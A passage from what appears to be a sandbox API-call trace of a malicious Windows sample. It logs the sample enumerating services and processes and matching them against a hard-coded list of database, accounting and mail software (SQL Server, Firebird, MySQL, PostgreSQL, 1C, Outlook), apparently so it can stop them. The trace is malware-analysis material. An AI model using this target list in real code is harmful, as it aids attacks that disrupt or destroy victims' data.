lpString2="MpsSvc") returned 1 [0046.036] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0046.036] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0046.036] lstrlenW (lpString="Netman") returned 6 [0046.036] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0046.036] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0046.036] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0046.036] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0046.036] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0046.036] lstrlenW (lpString="netprofm") returned 8 [0046.036] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0046.036] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0046.036] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0046.036] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0046.036] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0046.036] lstrlenW (lpString="NlaSvc") returned 6 [0046.036] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0046.036] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0046.036] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0046.036] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0046.036] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0046.036] lstrlenW (lpString="nsi") returned 3 [0046.036] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0046.036] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0046.036] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0046.036] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0046.036] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0046.036] lstrlenW (lpString="PcaSvc") returned 6 [0046.036] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0046.036] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0046.036] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0046.036] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0046.037] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0046.037] lstrlenW (lpString="PlugPlay") returned 8 [0046.037] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0046.037] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0046.037] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0046.037] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0046.037] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0046.037] lstrlenW (lpString="Power") returned 5 [0046.037] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0046.037] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0046.037] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0046.037] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0046.037] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0046.037] lstrlenW (lpString="ProfSvc") returned 7 [0046.037] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0046.037] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0046.037] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0046.037] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0046.037] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0046.037] lstrlenW (lpString="RpcEptMapper") returned 12 [0046.037] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0046.037] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0046.037] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0046.037] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0046.037] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0046.037] lstrlenW (lpString="RpcSs") returned 5 [0046.037] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0046.037] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0046.037] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0046.037] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0046.037] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0046.037] lstrlenW (lpString="SamSs") returned 5 [0046.037] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0046.038] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0046.038] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0046.038] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0046.038] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0046.038] lstrlenW (lpString="Schedule") returned 8 [0046.038] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0046.038] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0046.038] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0046.038] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0046.038] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0046.038] lstrlenW (lpString="SENS") returned 4 [0046.038] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0046.038] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0046.038] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0046.038] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0046.038] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0046.038] lstrlenW (lpString="ShellHWDetection") returned 16 [0046.038] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0046.038] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0046.038] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0046.038] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0046.038] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0046.038] lstrlenW (lpString="Spooler") returned 7 [0046.038] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0046.038] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0046.038] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0046.038] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0046.038] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0046.038] lstrlenW (lpString="swprv") returned 5 [0046.038] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0046.038] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0046.038] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0046.038] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0046.038] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0046.039] lstrlenW (lpString="SysMain") returned 7 [0046.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0046.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0046.039] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0046.039] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0046.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0046.039] lstrlenW (lpString="Themes") returned 6 [0046.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0046.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0046.039] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0046.039] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0046.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0046.039] lstrlenW (lpString="TrkWks") returned 6 [0046.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0046.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0046.039] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0046.039] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0046.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0046.039] lstrlenW (lpString="UxSms") returned 5 [0046.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0046.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0046.039] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0046.039] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0046.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0046.039] lstrlenW (lpString="VSS") returned 3 [0046.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0046.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0046.039] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0046.039] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0046.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0046.039] lstrlenW (lpString="WdiServiceHost") returned 14 [0046.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0046.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0046.040] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0046.040] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0046.040] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0046.040] lstrlenW (lpString="WdiSystemHost") returned 13 [0046.040] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0046.040] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0046.040] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0046.040] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0046.040] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0046.040] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0046.040] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0046.040] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0046.040] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0046.040] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0046.040] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0046.040] lstrlenW (lpString="Winmgmt") returned 7 [0046.040] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0046.040] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0046.040] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0046.040] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0046.040] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0046.040] lstrlenW (lpString="WPDBusEnum") returned 10 [0046.040] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0046.040] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0046.040] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0046.040] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0046.040] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0046.040] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3800fb0 | out: hHeap=0x5f0000) returned 1 [0046.040] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fc [0046.043] Process32FirstW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0046.043] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0046.044] lstrlenW (lpString="System") returned 6 [0046.044] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0046.044] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0046.044] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0046.044] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0046.044] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0046.044] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0046.044] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0046.044] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0046.045] lstrlenW (lpString="smss.exe") returned 8 [0046.045] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0046.045] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0046.045] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0046.045] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0046.045] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0046.045] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0046.045] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0046.045] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0046.046] lstrlenW (lpString="csrss.exe") returned 9 [0046.046] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0046.046] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0046.046] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0046.046] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0046.046] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0046.046] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0046.046] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0046.046] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0046.047] lstrlenW (lpString="wininit.exe") returned 11 [0046.047] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0046.047] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0046.047] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0046.047] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0046.048] lstrlenW (lpString="csrss.exe") returned 9 [0046.048] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0046.048] lstrlenW (lpString="winlogon.exe") returned 12 [0046.048] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0046.049] lstrlenW (lpString="services.exe") returned 12 [0046.049] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0046.050] lstrlenW (lpString="lsass.exe") returned 9 [0046.050] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0046.051] lstrlenW (lpString="lsm.exe") returned 7 [0046.051] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.051] lstrlenW (lpString="svchost.exe") returned 11 [0046.051] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.052] lstrlenW (lpString="svchost.exe") returned 11 [0046.052] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.053] lstrlenW (lpString="svchost.exe") returned 11 [0046.053] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.053] lstrlenW (lpString="svchost.exe") returned 11 [0046.053] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.054] lstrlenW (lpString="svchost.exe") returned 11 [0046.054] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0046.055] lstrlenW (lpString="audiodg.exe") returned 11 [0046.055] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.055] lstrlenW (lpString="svchost.exe") returned 11 [0046.056] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.056] lstrlenW (lpString="svchost.exe") returned 11 [0046.056] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0046.057] lstrlenW (lpString="dwm.exe") returned 7 [0046.057] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0046.057] lstrlenW (lpString="explorer.exe") returned 12 [0046.058] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0046.058] lstrlenW (lpString="spoolsv.exe") returned 11 [0046.058] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0046.059] lstrlenW (lpString="taskhost.exe") returned 12 [0046.059] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.060] lstrlenW (lpString="svchost.exe") returned 11 [0046.060] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0046.060] lstrlenW (lpString="taskeng.exe") returned 11 [0046.060] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0046.061] lstrlenW (lpString="taskhost.exe") returned 12 [0046.061] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0046.062] lstrlenW (lpString="entrepreneur.exe") returned 16 [0046.062] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0046.062] lstrlenW (lpString="andrew kinds.exe") returned 16 [0046.062] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0046.063] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0046.063] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0046.064] lstrlenW (lpString="educated.exe") returned 12 [0046.064] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0046.064] lstrlenW (lpString="servers.exe") returned 11 [0046.064] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0046.136] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0046.136] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0046.137] lstrlenW (lpString="gbp_chair.exe") returned 13 [0046.137] Process32NextW (in: hSnapshot=0x1fc, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, 